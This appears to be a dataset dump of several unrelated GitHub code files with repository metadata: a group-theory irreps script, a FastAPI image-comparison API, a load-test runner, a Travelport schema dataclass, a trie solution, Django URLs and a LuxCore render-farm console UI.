irrep_tmp ) == nop, len( irrep_tmp )\n\t\t\t\tif all( [ abs( np.trace(irrep_conj[i_tmp]) - np.trace(irrep_tmp[i_tmp]) ) \\\n\t\t\t\t\t\t< 1e-4 for i_tmp in range(nop) ] ) :\n\t\t\t\t\tfind_conj = True\n\t\t\t\t\tirrep_conj_name = irrep_name_tmp\n\t\t\t\t\tbreak\n\t\t\tassert find_conj, ( ipg+1, irrep_name )\n\t\t\tpair = sorted( [ irrep_name, irrep_conj_name ] ) \n\t\t\tif pair not in Kramers :\n\t\t\t\tKramers.append( pair )\n\t\t#print( '\\n' )\n\tprint( 'Kramers:', Kramers )\t\n\tprint( '\\n' )\n'''\n\n# =====================================================\n# Inverse (pair) \n# =====================================================\n\n'''\nfor ipg in range( 32 ) :\n\tprint( 'PG:', ipg+1 )\n\tpg = all_pg_irreps[ipg]\n\top_square_dic = { }\n\tnop = len( pg['sym_ops'] )\n\tfor i in range( nop ) :\n\t\topp = [ j for j in range(nop) if np.linalg.norm( \\\n\t\t\tnp.dot( pg['sym_ops'][i][1], pg['sym_ops'][i][1] ) \\\n\t\t\t- pg['sym_ops'][j][1] ) < 1e-6 ]\n\t\tassert len(opp) == 1, ( len(opp), pg['sym_ops'][i][0] ) \n\t\topp = opp[0]\n\t\top_square_dic[i] = opp\n\t#\n\tpairs = [ ]\n\tnirreps = len( pg['dv_irrep_names'] )\n\tfor ir in range( nirreps ) :\n\t\tirrep = [ pg['dv_irreps'][k][ir] for k in range(nop) ]\n\t\tirrep_name = pg['dv_irrep_names'][ir]\n\t\t#print( irrep_name )\n\t\t#print( irrep )\n\t\tassert len( irrep ) == nop\t\t\n\t\tfind_inv = False\n\t\tirrep_inv_name = ''\n\t\tfor jr in range( nirreps ) :\n\t\t\tirrep_tmp = [ pg['dv_irreps'][k][jr] for k in range(nop) ]\n\t\t\tirrep_name_tmp = pg['dv_irrep_names'][jr]\n\t\t\tassert len( irrep_tmp ) == nop, len( irrep_tmp )\n\t\t\tif all( [ abs( np.linalg.norm( irrep[i_tmp] + irrep_tmp[i_tmp] ) ) \\\n\t\t\t\t\t\t< 1e-4 for i_tmp in range(nop) ] ) :\n\t\t\t\tfind_inv = True\n\t\t\t\tirrep_inv_name = irrep_name_tmp\n\t\t\t\tbreak\n\t\tassert find_inv, ( ipg+1, irrep_name )\n\t\tpair = sorted( [ irrep_name, irrep_inv_name ] ) \n\t\tif pair not in pairs :\n\t\t\tpairs.append( pair )\n\t\t#print( '\\n' )\n\tprint( 'pairs:', pairs )\t\n\tprint( '\\n' )\n'''\n\n# =================================================================\n# generate 32 PGs \n# =================================================================\n\n'''\nif not os.path.exists('PG') :\n\tos.mkdir('PG')\t\t\n\t\nfor i in range( 32 ) :\n\tprint( 'PG:', (i+1) )\n\txx = all_pg_irreps[i]\n\t#print( xx['sym_ops'] )\n\tops = [ symop( opp[1], opp[0] ) for opp in xx['sym_ops'] ]\n\t#for op in ops :\n\t#\tprint(op.mat)\n\tipg = i+1\n\tpg = Pointgroup( ops, ipg )\n\t#print( pg.cls )\n\t#print( '\\n' ) \n\tname = './PG/'+str(ipg)+'.dat'\t\t\n\tfd = open(name, 'wb')\t\t\n\tpk.dump(pg,fd)\t\t\n\tfd.close()\n'''\n\n# ========================================================================\n# get point group \n# ========================================================================\n\ndef getPG( ipg ) :\n\tname = './PG/'+str(ipg)+'.dat'\t\t\n\tfd = open(name, 'rb')\t\t\n\tpg = pk.load(fd)\t\t\n\tfd.close()\n\treturn pg\n\n# =====================================================================\n\nT = getPG(28)\nfor op in T.op:\n\tprint( op.name )\niC2x = 3\niC2z = 1\niC2y = 2 \niC3111p = 4\n\niC2x_inv = T.inv[iC2x]\niC2y_inv = T.inv[iC2y]\niC2z_inv = T.inv[iC2z]\n#print( T.mut[ ( iC3111p, iC2z ) ] )\nprint( T.mut[ ( iC2x_inv, T.mut[ ( iC3111p, iC2z ) ] ) ] )\nprint( T.mut[ ( iC2y_inv, T.mut[ ( iC3111p, iC2x ) ] ) ] )\nprint( T.mut[ ( iC2z_inv, T.mut[ ( iC3111p, iC2y ) ] ) ] )\n#subgroup = T.get_subgroup( [ iC2x,iC2y,iC2z ] ) \nsubgroup = T.get_subgroup( [ iC3111p ] ) \nprint( T.get_coset( subgroup ) )\n\n'''\nfor i in range( 1, 33 ) :\n\tfor op in getPG(i).op :\n\t\tprint( op.name )\n\t\tprint( op.su2 )\n\tprint( '\\n' )\n'''\n\n","repo_name":"pengbingrui26/Point_group_datas","sub_path":"irreps.py","file_name":"irreps.py","file_ext":"py","file_size_in_byte":7052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"27183686587","text":"import datetime\nimport io\nimport cv2\nfrom fastapi import (\n FastAPI, \n UploadFile, \n File, \n HTTPException, \n status,\n Depends\n)\nfrom fastapi.responses import Response\nimport numpy as np\nfrom functools import cache\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom PIL import Image\nfrom middlewares.inference import Comparator\nfrom utils.config import get_settings\nfrom utils.responses import StatusResponse\nfrom pydantic import BaseModel\nfrom middlewares.inference import Comparison\nfrom utils.image_processor import ImageProcessor, Type_Enum, process_images\nfrom fastapi.responses import StreamingResponse\nimport csv\nfrom io import StringIO\n\nSETTINGS = get_settings()\n\nentries = []\n\napp = FastAPI(title=SETTINGS.api_name, version=SETTINGS.api_version)\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"], \n allow_headers=[\"*\"], \n)\n\nIMAGES_PATH = SETTINGS.images_path\n\n\nimages_dict = {\n 0: '../first_project/assets/base/original/harrypotter-og.png',\n 1: '../first_project/assets/base/original/lalaland-og.png',\n 2: '../first_project/assets/base/original/msdoubtfire-og.png',\n 3: '../first_project/assets/base/original/starwars-og.png',\n 4: '../first_project/assets/base/original/taxidriver-og.png',\n 5: '../first_project/assets/base/original/theshowman-og.png',\n 6: '../first_project/assets/base/original/titanic-og.png',\n}\n\n@cache \ndef get_comparator():\n print(\"Creating comparator...\")\n return Comparator()\n\ndef create_entry(result, image_1, shape, image_2_name):\n return {\n \"id\": len(entries) + 1,\n\n \"date\": datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"),\n \"image_input\": image_1.filename,\n \"image_input_size\": shape,\n \"image_target\": image_2_name.split(\"/\")[-1],\n \"similarity\": result.similarity,\n \"time_ms\": result.time_ms,\n \"model\": SETTINGS.name_of_model\n\n }\ndef upload_and_compare(file1, file2, comparator, mod_name):\n img_stream_1 = io.BytesIO(file1.file.read())\n with open(file2, \"rb\") as file:\n image_content = file.read()\n img_stream_2 = io.BytesIO(image_content)\n if file1.content_type.split(\"/\")[0] != \"image\":\n raise HTTPException(\n status_code=status.HTTP_415_UNSUPPORTED_MEDIA_TYPE, \n detail=\"Not an image\"\n )\n img_obj_1 = Image.open(img_stream_1)\n img_obj_1 = np.array(img_obj_1)\n img_obj_2 = Image.open(img_stream_2)\n img_obj_2 = np.array(img_obj_2)\n\n img_route_1 = f\"{IMAGES_PATH}/input-{mod_name}.png\"\n img_route_2 = f\"{IMAGES_PATH}/target-{mod_name}.png\"\n\n img_obj_1 = cv2.cvtColor(img_obj_1, cv2.COLOR_RGB2BGR)\n img_obj_2 = cv2.cvtColor(img_obj_2, cv2.COLOR_RGB2BGR)\n\n cv2.imwrite(img_route_1, img_obj_1)\n cv2.imwrite(img_route_2, img_obj_2)\n\n image_size = process_images()\n process_images(Type_Enum.GRAYSCALE)\n\n img_route_1 = f\"{IMAGES_PATH}/processed/input-{mod_name}.png\"\n img_route_2 = f\"{IMAGES_PATH}/processed/target-{mod_name}.png\"\n\n print(\"Images saved\")\n\n return comparator.compare(image_1=img_route_1, image_2=img_route_2), image_size\n\n@app.get(\"/\")\ndef read_root():\n return {\"message\": \"Hello, CORS is enabled\"}\n@app.get(\"/status\")\nasync def status():\n return StatusResponse(status=\"ok\", description=\"Service for image comparison through embedding\", model_name=SETTINGS.name_of_model)\n\n@app.get('/reports-json')\nasync def reports_json():\n return entries\n\n@app.get('/reports')\nasync def export_csv():\n if not entries:\n raise HTTPException(status_code=404, detail=\"No data available\")\n\n csv_data = StringIO()\n csv_writer = csv.DictWriter(\n csv_data,\n fieldnames=[\n \"id\",\n \"date\",\n \"image_input\",\n \"image_input_size\",\n \"image_target\",\n \"similarity\",\n \"time_ms\",\n \"model\",\n ],\n )\n csv_writer.writeheader()\n csv_writer.writerows(entries)\n\n response = StreamingResponse(\n iter([csv_data.getvalue()]),\n media_type=\"text/csv\",\n headers={\n \"Content-Disposition\": \"attachment;filename=reports.csv\",\n },\n )\n\n return response\n\n\n@app.post(\"/predict\")\ndef compare_images(\n file_1: UploadFile = File(...), \n file_2: int = 0, \n file_number: int = 1,\n comparator: Comparator = Depends(get_comparator)\n) -> Comparison:\n file_2_image = images_dict[file_2]\n print(file_2_image)\n print(\"Comparing images...\")\n result, image_size = upload_and_compare(file_1, file_2_image, comparator, file_number)\n entries.append(create_entry(result, file_1, image_size, file_2_image))\n print(f\"{result.similarity*100}% similarity between {file_1.filename} and target\")\n return result\n\nif __name__ == \"__main__\":\n import uvicorn\n uvicorn.run(\"app:app\", host=\"127.0.0.1\", port=8001, reload=True) ","repo_name":"MauriVargas17/Act-This-Page","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"19133030376","text":"import subprocess\r\nimport sys\r\nimport traceback\r\n\r\n\r\ndef run_load_Test(url, users, ramp_up_rate, run_time):\r\n try:\r\n subprocess.run([\"locust\", \"-f\", \"load_test.py\", \"--csv=test\", \"--headless\", f\"--host={url}\",'-u', f\"{users}\",'-r', f\"{ramp_up_rate}\", '--run-time', f\"{run_time}\" ], check=True)\r\n print(\"Load test completed successfully!\")\r\n except subprocess.CalledProcessError:\r\n print(\"An error occurred while running the site test.\")\r\n return \r\n\r\ndef run_build_test():\r\n try:\r\n subprocess.run([\"python\", \"load_test_file_builder.py\"], check=True)\r\n print(\"Load test file build completed successfully!\")\r\n except subprocess.CalledProcessError:\r\n print(\"An error occurred while running theload test builder.\")\r\n\r\ndef run_site_test(site_name, output_name):\r\n try:\r\n subprocess.run([\"python\", \"SiteTester.py\", site_name, output_name], check=True)\r\n print(\"Site test completed successfully!\")\r\n except subprocess.CalledProcessError:\r\n print(\"An error occurred while running the site test.\")\r\n\r\ndef run_report_builder():\r\n try:\r\n subprocess.run([\"python\", \"ReportBuilder.py\"], check=True)\r\n print(\"Report Builder completed successfully!\")\r\n except subprocess.CalledProcessError:\r\n print(\"An error occurred while running the report builder.\")\r\n\r\nif __name__ == \"__main__\":\r\n try:\r\n #python RunAllTests.py -site -users -ramp_up_rate -test_time(seconds)\r\n run_site_test(str(sys.argv[1]), \"sitetestresults.csv\")\r\n run_build_test()\r\n run_load_Test(str(sys.argv[1]), str(sys.argv[2]), str(sys.argv[3]), str(sys.argv[4]))\r\n run_report_builder()\r\n except Exception as e:\r\n print(f\"Error - {e}\")\r\n traceback.print_exc()","repo_name":"darichards10/WebsiteTester","sub_path":"RunAllTests.py","file_name":"RunAllTests.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"43209759622","text":"from __future__ import annotations\nfrom dataclasses import dataclass, field\nfrom travelport.models.rail_journey import RailJourney\n\n__NAMESPACE__ = \"http://www.travelport.com/schema/rail_v52_0\"\n\n\n@dataclass\nclass RailJourneyList:\n \"\"\"\n List of Rail Journeys.\n \"\"\"\n class Meta:\n namespace = \"http://www.travelport.com/schema/rail_v52_0\"\n\n rail_journey: list[RailJourney] = field(\n default_factory=list,\n metadata={\n \"name\": \"RailJourney\",\n \"type\": \"Element\",\n \"max_occurs\": 999,\n }\n )\n","repo_name":"tefra/xsdata-samples","sub_path":"travelport/models/rail_journey_list.py","file_name":"rail_journey_list.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"70"}
+{"seq_id":"10704275842","text":"class node:\r\n def __init__(self):\r\n self.trie = dict()\r\n \r\n def insert(self, line):\r\n now = self.trie\r\n for c in line:\r\n if c not in now:\r\n now[c] = [1,dict()]\r\n else:\r\n now[c][0] += 1\r\n now = now[c][1]\r\n \r\n def show(self):\r\n print(self.trie)\r\n \r\n def find(self, line):\r\n depth = 1\r\n now = self.trie\r\n for c in line[:-1]:\r\n if now[c][0] == 1:\r\n break\r\n now = now[c][1]\r\n depth += 1\r\n \r\n #print(line, depth)\r\n return depth\r\n\r\ndef solution(words):\r\n answer = 0\r\n n = node()\r\n for word in words:\r\n n.insert(word)\r\n #n.show()\r\n for word in words:\r\n answer += n.find(word)\r\n return answer","repo_name":"LINDBURG/Programmers","sub_path":"2018_KBR_자동완성.py","file_name":"2018_KBR_자동완성.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"10668525811","text":"#Groups URLS.py file\nfrom django.urls import path, re_path\nfrom groups import views\n\napp_name = 'groups'\n\nurlpatterns = [\n path('',views.ListGroups.as_view(),name='all'),\n path('create',views.CreateGroup.as_view(),name='create'),\n path('post/in/',views.SingleGroup.as_view(),name='single'),\n # re_path('posts/in/(?P[-\\w]+)/$',views.SingleGroup.as_view(),name='single'),\n path('join/',views.JoinGroup.as_view(),name='join'),\n path('leave/',views.LeaveGroup.as_view(),name='leave')\n]\n","repo_name":"Shahbaaz16/GroupsProj","sub_path":"socialMedia/groups/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"6457185484","text":"import sys\nimport time\nimport logging\nimport functools\nimport socket\n\n# For some unknown reason, I need to import pyluxcore before PySide2 or\n# it will break streams and parsing in an unpredictable way\nimport pyluxcore\n\ntry:\n\timport PySide.QtCore as QtCore\n\timport PySide.QtGui as QtGui\n\timport PySide.QtGui as QtWidgets\n\tPYSIDE_V = int(QtCore.qVersion()[:1])\nexcept ImportError:\n\ttry:\n\t\tfrom PySide2 import QtGui, QtCore, QtWidgets\n\t\tPYSIDE_V = int(QtCore.qVersion()[:1])\n\texcept ImportError:\n\t\tfrom PySide6 import QtGui, QtCore, QtWidgets\n\t\tPYSIDE_V = int(QtCore.qVersion()[:1])\n\nimport pyluxcoretools.renderfarm.renderfarm as renderfarm\nimport pyluxcoretools.renderfarm.renderfarmjobsingleimage as jobsingleimage\nimport pyluxcoretools.utils.loghandler as loghandler\nfrom pyluxcoretools.utils.logevent import LogEvent\nimport pyluxcoretools.utils.uiloghandler as uiloghandler\nimport pyluxcoretools.utils.netbeacon as netbeacon\nimport pyluxcoretools.pyluxcorenetconsole.mainwindow as mainwindow\nimport pyluxcoretools.pyluxcorenetconsole.addnodedialog as addnodedialog\n\nlogger = logging.getLogger(loghandler.loggerName + \".luxcorenetconsoleui\")\n\nclass CurrentJobUpdateEvent(QtCore.QEvent):\n\tEVENT_TYPE = QtCore.QEvent.Type(QtCore.QEvent.registerEventType())\n\n\tdef __init__(self):\n\t\tsuper(CurrentJobUpdateEvent, self).__init__(self.EVENT_TYPE)\n\nclass JobsUpdateEvent(QtCore.QEvent):\n\tEVENT_TYPE = QtCore.QEvent.Type(QtCore.QEvent.registerEventType())\n\n\tdef __init__(self):\n\t\tsuper(JobsUpdateEvent, self).__init__(self.EVENT_TYPE)\n\nclass NodesUpdateEvent(QtCore.QEvent):\n\tEVENT_TYPE = QtCore.QEvent.Type(QtCore.QEvent.registerEventType())\n\n\tdef __init__(self):\n\t\tsuper(NodesUpdateEvent, self).__init__(self.EVENT_TYPE)\n\nclass QueuedJobsTableModel(QtCore.QAbstractTableModel):\n\tdef __init__(self, parent, renderFarm, * args):\n\t\tQtCore.QAbstractTableModel.__init__(self, parent, * args)\n\t\tself.renderFarm = renderFarm\n\n\tdef rowCount(self, parent):\n\t\treturn self.renderFarm.GetQueuedJobCount()\n\n\tdef columnCount(self, parent):\n\t\treturn 2\n\n\tdef data(self, index, role):\n\t\tif not index.isValid():\n\t\t\treturn None\n\t\telif role != QtCore.Qt.DisplayRole:\n\t\t\treturn None\n\t\telse:\n\t\t\tif index.column() == 0:\n\t\t\t\treturn index.row()\n\t\t\telif index.column() == 1:\n\t\t\t\treturn self.renderFarm.GetQueuedJobList()[index.row()].GetRenderConfigFileName()\n\t\t\telse:\n\t\t\t\treturn \"\"\n\n\tdef headerData(self, col, orientation, role):\n\t\tif orientation == QtCore.Qt.Horizontal and role == QtCore.Qt.DisplayRole:\n\t\t\tif col == 0:\n\t\t\t\treturn \"#\";\n\t\t\telif col == 1:\n\t\t\t\treturn \"Render configuration\"\n\t\t\telse:\n\t\t\t\treturn \"\"\n\t\treturn None\n\n\tdef Update(self):\n\t\tself.emit(QtCore.SIGNAL(\"layoutChanged()\"))\n\nclass NodesTableModel(QtCore.QAbstractTableModel):\n\tdef __init__(self, parent, renderFarm, * args):\n\t\tQtCore.QAbstractTableModel.__init__(self, parent, * args)\n\t\tself.renderFarm = renderFarm\n\n\tdef rowCount(self, parent):\n\t\treturn self.renderFarm.GetNodesListCount()\n\n\tdef columnCount(self, parent):\n\t\treturn 3\n\n\tdef data(self, index, role):\n\t\tif not index.isValid():\n\t\t\treturn None\n\t\telif role != QtCore.Qt.DisplayRole:\n\t\t\treturn None\n\t\telse:\n\t\t\tif index.column() == 0:\n\t\t\t\treturn index.row()\n\t\t\telif index.column() == 1:\n\t\t\t\tnode = self.renderFarm.GetNodesList()[index.row()]\n\n\t\t\t\treturn node.GetKey()\n\t\t\telif index.column() == 2:\n\t\t\t\tnode = self.renderFarm.GetNodesList()[index.row()]\n\n\t\t\t\treturn node.state.name\n\t\t\telse:\n\t\t\t\treturn \"\"\n\n\tdef headerData(self, col, orientation, role):\n\t\tif orientation == QtCore.Qt.Horizontal and role == QtCore.Qt.DisplayRole:\n\t\t\tif col == 0:\n\t\t\t\treturn \"#\";\n\t\t\telif col == 1:\n\t\t\t\treturn \"Rendering node address\"\n\t\t\telif col == 2:\n\t\t\t\treturn \"Status\"\n\t\t\telse:\n\t\t\t\treturn \"\"\n\n\t\treturn None\n\n\tdef Update(self):\n\t\tself.emit(QtCore.SIGNAL(\"layoutChanged()\"))\n\nclass AddNodeDialog(QtWidgets.QDialog, addnodedialog.Ui_DialogAddNode):\n\tdef __init__(self, parent = None):\n\t\tsuper(AddNodeDialog, self).__init__(parent)\n\t\tself.setupUi(self)\n\n\t\tif PYSIDE_V >= 6:\n\t\t\tipRegExp = QtCore.QRegularExpression(\"^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]).){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$\")\n\t\t\tipRegExpVal = QtGui.QRegularExpressionValidator(ipRegExp)\n\t\telse:\n\t\t\tipRegExp = QtCore.QRegExp(\"^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]).){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$\")\n\t\t\tipRegExpVal = QtGui.QRegExpValidator(ipRegExp)\n\t\tself.lineEditIPAddress.setValidator(ipRegExpVal)\n\t\tself.lineEditPort.setValidator(QtGui.QIntValidator(0, 65535))\n\t\tself.lineEditPort.setText(str(renderfarm.DEFAULT_PORT))\n\n\t\tif PYSIDE_V < 5:\n\t\t\tself.move(QtWidgets.QApplication.desktop().screen().rect().center()- self.rect().center())\n\t\t\n\tdef GetIPAddress(self):\n\t\treturn self.lineEditIPAddress.text()\n\t\n\tdef GetPort(self):\n\t\treturn self.lineEditPort.text()\n\t\t\n\nclass MainApp(QtWidgets.QMainWindow, mainwindow.Ui_MainWindow, logging.Handler):\n\tdef __init__(self, parent=None):\n\t\tsuper(MainApp, self).__init__(parent)\n\t\tself.setupUi(self)\n\n\t\tif PYSIDE_V < 5:\n\t\t\tself.move(QtWidgets.QApplication.desktop().screen().rect().center()- self.rect().center())\n\t\t\n\t\tuiloghandler.AddUILogHandler(loghandler.loggerName, self)\n\t\t\n\t\tself.tabWidgetMain.setTabEnabled(0, False)\n\t\tself.tabWidgetMain.setCurrentIndex(1)\n\t\t\n\t\tself.lineEditHaltSPP.setValidator(QtGui.QIntValidator(0, 9999999))\n\t\tself.lineEditHaltTime.setValidator(QtGui.QIntValidator(0, 9999999))\n\t\tself.lineEditFilmUpdatePeriod.setValidator(QtGui.QIntValidator(0, 9999999))\n\t\tself.lineEditStatsPeriod.setValidator(QtGui.QIntValidator(1, 9999999))\n\n\t\tlogger.info(\"LuxCore %s\" % pyluxcore.Version())\n\t\t\n\t\t#-----------------------------------------------------------------------\n\t\t# Create the render farm\n\t\t#-----------------------------------------------------------------------\n\n\t\tself.renderFarm = renderfarm.RenderFarm()\n\t\tself.renderFarm.Start()\n\t\t\n\t\t#-----------------------------------------------------------------------\n\t\t# Start the beacon receiver\n\t\t#-----------------------------------------------------------------------\n\t\t\n\t\tself.beacon = netbeacon.NetBeaconReceiver(functools.partial(MainApp.__NodeDiscoveryCallBack, self))\n\t\tself.beacon.Start()\n\t\t\n\t\t#-----------------------------------------------------------------------\n\t\t# Create the queued jobs widget table\n\t\t#-----------------------------------------------------------------------\n\n\t\tself.queuedJobsTableModel = QueuedJobsTableModel(self, self.renderFarm)\n\t\tself.queuedJobsTableView = QtWidgets.QTableView()\n\t\tself.queuedJobsTableView.setModel(self.queuedJobsTableModel)\n\t\tself.queuedJobsTableView.resizeColumnsToContents()\n\n\t\tself.vboxLayoutQueuedJobs = QtWidgets.QVBoxLayout(self.scrollAreaQueuedJobs)\n\t\tself.vboxLayoutQueuedJobs.setObjectName(\"vboxLayoutQueuedJobs\")\n\t\tself.vboxLayoutQueuedJobs.addWidget(self.queuedJobsTableView)\n\t\tself.scrollAreaQueuedJobs.setLayout(self.vboxLayoutQueuedJobs)\n\n\t\t#-----------------------------------------------------------------------\n\t\t# Create the nodes widget table\n\t\t#-----------------------------------------------------------------------\n\n\t\tself.nodesTableModel = NodesTableModel(self, self.renderFarm)\n\t\tself.nodesTableView = QtWidgets.QTableView()\n\t\tself.nodesTableView.setModel(self.nodesTableModel)\n\t\tself.nodesTableView.resizeColumnsToContents()\n\n\t\tself.vboxLayoutNodes = QtWidgets.QVBoxLayout(self.scrollAreaNodes)\n\t\tself.vboxLayoutNodes.setObjectName(\"vboxLayoutNodes\")\n\t\tself.vboxLayoutNodes.addWidget(self.nodesTableView)\n\t\tself.scrollAreaNodes.setLayout(self.vboxLayoutNodes)\n\n\t\t#-----------------------------------------------------------------------\n\n\t\tself.renderFarm.SetJobsUpdateCallBack(functools.partial(MainApp.__RenderFarmJobsUpdateCallBack, self))\n\t\tself.__RenderFarmJobsUpdateCallBack()\n\t\t\n\t\tself.renderFarm.SetNodesUpdateCallBack(functools.partial(MainApp.__RenderFarmNodesUpdateCallBack, self))\n\t\tself.__RenderFarmNodesUpdateCallBack()\n\n\tdef PrintMsg(self, msg):\n\t\tQtCore.QCoreApplication.postEvent(self, LogEvent(msg))\n\n\tdef __FormatSamplesSec(self, val):\n\t\tif val < 1000000.0:\n\t\t\treturn \"%.1f\" % (val / 1000.0) + \"K\"\n\t\telse:\n\t\t\treturn \"%.1f\" % (val / 1000000.0) + \"M\"\n\n\tdef __NodeDiscoveryCallBack(self, ipAddress, port):\n\t\tself.renderFarm.DiscoveredNode(ipAddress, port, renderfarm.NodeDiscoveryType.AUTO_DISCOVERED)\n\n\tdef __RenderFarmJobsUpdateCallBack(self):\n\t\tQtCore.QCoreApplication.postEvent(self, JobsUpdateEvent())\n\n\tdef __RenderFarmNodesUpdateCallBack(self):\n\t\tQtCore.QCoreApplication.postEvent(self, NodesUpdateEvent())\n\n\tdef __CurrentJobUpdateCallBack(self):\n\t\tQtCore.QCoreApplication.postEvent(self, CurrentJobUpdateEvent())\n\n\tdef __UpdateNodesTab(self):\n\t\tself.nodesTableModel.Update()\n\t\tself.nodesTableView.resizeColumnsToContents()\n\t\n\tdef __UpdateCurrentRenderingImage(self):\n\t\tcurrentJob = self.renderFarm.currentJob\n\t\t\n\t\tif currentJob:\n\t\t\tpixMap = QtGui.QPixmap(currentJob.GetImageFileName())\n\n\t\t\tif pixMap.isNull():\n\t\t\t\tself.labelRenderingImage.setPixmap(None)\n\t\t\t\tself.labelRenderingImage.setText(\"Waiting for film download and merge\")\n\t\t\t\tself.labelRenderingImage.show()\n\t\t\telse:\n\t\t\t\tself.labelRenderingImage.setPixmap(pixMap)\n\t\t\t\tself.labelRenderingImage.setText(\"\")\n\t\t\t\tself.labelRenderingImage.resize(pixMap.size())\n\t\t\t\tself.labelRenderingImage.show()\n\t\telse:\n\t\t\tself.labelRenderingImage.setPixmap(None)\n\t\t\tself.labelRenderingImage.setText(\"N/A\")\n\t\t\tself.labelRenderingImage.show()\n\n\tdef __UpdateCurrentJobTab(self):\n\t\tcurrentJob = self.renderFarm.currentJob\n\t\t\n\t\tif currentJob:\n\t\t\tself.tabWidgetMain.setTabEnabled(0, True)\n\t\t\t\n\t\t\tself.labelRenderCfgFileName.setText(\"\" + currentJob.GetRenderConfigFileName() + \" \")\n\t\t\tself.labelFilmFileName.setText(\"\" + currentJob.GetFilmFileName() + \" \")\n\t\t\tself.labelImageFileName.setText(\"\" + currentJob.GetImageFileName() + \" \")\n\t\t\tself.labelWorkDirectory.setText(\"\" + currentJob.GetWorkDirectory() + \" \")\n\t\t\t\n\t\t\trenderingStartTime = currentJob.GetStartTime()\n\t\t\tself.labelStartTime.setText(\"\" + time.strftime(\"%H:%M:%S %Y/%m/%d\", time.localtime(renderingStartTime)) + \" \")\n\n\t\t\tdt = time.time() - renderingStartTime\n\t\t\tself.labelRenderingTime.setText(\"\" + time.strftime(\"%H:%M:%S\", time.gmtime(dt)) + \" \")\n\t\t\tself.labelSamplesPixel.setText(\"\" + \"%.1f\" % (currentJob.GetSamplesPixel()) + \" \")\n\t\t\tself.labelSamplesSec.setText(\"\" + self.__FormatSamplesSec(currentJob.GetSamplesSec()) + \" \")\n\n\t\t\tself.lineEditHaltSPP.setText(str(currentJob.GetFilmHaltSPP()))\n\t\t\tself.lineEditHaltTime.setText(str(currentJob.GetFilmHaltTime()))\n\t\t\tself.lineEditFilmUpdatePeriod.setText(str(currentJob.GetFilmUpdatePeriod()))\n\t\t\tself.lineEditStatsPeriod.setText(str(currentJob.GetStatsPeriod()))\n\n\t\t\t# Update the RenderingImage\n\t\t\tself.__UpdateCurrentRenderingImage()\n\n\t\t\tcurrentJob.SetJobUpdateCallBack(self.__CurrentJobUpdateCallBack)\n\t\telse:\n\t\t\tself.tabWidgetMain.setTabEnabled(0, False)\n\t\n\tdef __UpdateQueuedJobsTab(self):\n\t\tself.queuedJobsTableModel.Update()\n\t\tself.queuedJobsTableView.resizeColumnsToContents()\n\n\tdef clickedAddNode(self):\n\t\tdialog = AddNodeDialog(self)\n\t\tif dialog.exec_() == QtWidgets.QDialog.Accepted:\n\t\t\tipAddress = dialog.GetIPAddress()\n\t\t\tport = dialog.GetPort()\n\n\t\t\t# Check if it is a valid ip address\n\t\t\ttry:\n\t\t\t\tsocket.inet_aton(ipAddress)\n\t\t\texcept socket.error:\n\t\t\t\traise SyntaxError(\"Rendering node ip address syntax error: \" + node)\n\n\t\t\t# Check if it is a valid port\n\t\t\ttry:\n\t\t\t\tport = int(port)\n\t\t\texcept ValueError:\n\t\t\t\traise SyntaxError(\"Rendering node port syntax error: \" + node)\n\t\t\t\n\t\t\tself.renderFarm.DiscoveredNode(ipAddress, port, renderfarm.NodeDiscoveryType.MANUALLY_DISCOVERED)\n\n\tdef clickedAddJob(self):\n\t\tfileToRender, _ = QtWidgets.QFileDialog.getOpenFileName(parent=self,\n\t\t\t\tcaption='Open file to render', filter=\"Binary render configuration (*.bcf)\")\n\t\t\n\t\tif fileToRender:\n\t\t\tlogger.info(\"Creating single image render farm job: \" + fileToRender);\n\t\t\trenderFarmJob = jobsingleimage.RenderFarmJobSingleImage(self.renderFarm, fileToRender)\n\t\t\tself.renderFarm.AddJob(renderFarmJob)\n\t\t\n\t\t\tself.__UpdateCurrentJobTab()\n\t\t\tself.__UpdateQueuedJobsTab()\n\t\t\n\t\t\tself.tabWidgetMain.setCurrentIndex(0)\n \n\tdef clickedRemovePendingJobs(self):\n\t\tself.renderFarm.RemovePendingJobs()\n\t\tself.__UpdateQueuedJobsTab()\n\n\tdef editedHaltSPP(self):\n\t\tcurrentJob = self.renderFarm.currentJob\n\n\t\tif currentJob:\n\t\t\tval = max(0, int(self.lineEditHaltSPP.text()))\n\t\t\tcurrentJob.SetFilmHaltSPP(val)\n\t\t\tlogger.info(\"Halt SPP changed to: %d\" % val)\n\n\tdef editedHaltTime(self):\n\t\tcurrentJob = self.renderFarm.currentJob\n\n\t\tif currentJob:\n\t\t\tval = max(0, int(self.lineEditHaltTime.text()))\n\t\t\tcurrentJob.SetFilmHaltTime(val)\n\t\t\tlogger.info(\"Halt time changed to: %d\" % val)\n\n\tdef editedFilmUpdatePeriod(self):\n\t\tcurrentJob = self.renderFarm.currentJob\n\n\t\tif currentJob:\n\t\t\tval = max(10, int(self.lineEditFilmUpdatePeriod.text()))\n\t\t\tcurrentJob.SetFilmUpdatePeriod(val)\n\t\t\tlogger.info(\"Film update period changed to: %d\" % val)\n\t\t\n\tdef editedStatsPeriod(self):\n\t\tcurrentJob = self.renderFarm.currentJob\n\n\t\tif currentJob:\n\t\t\tval = 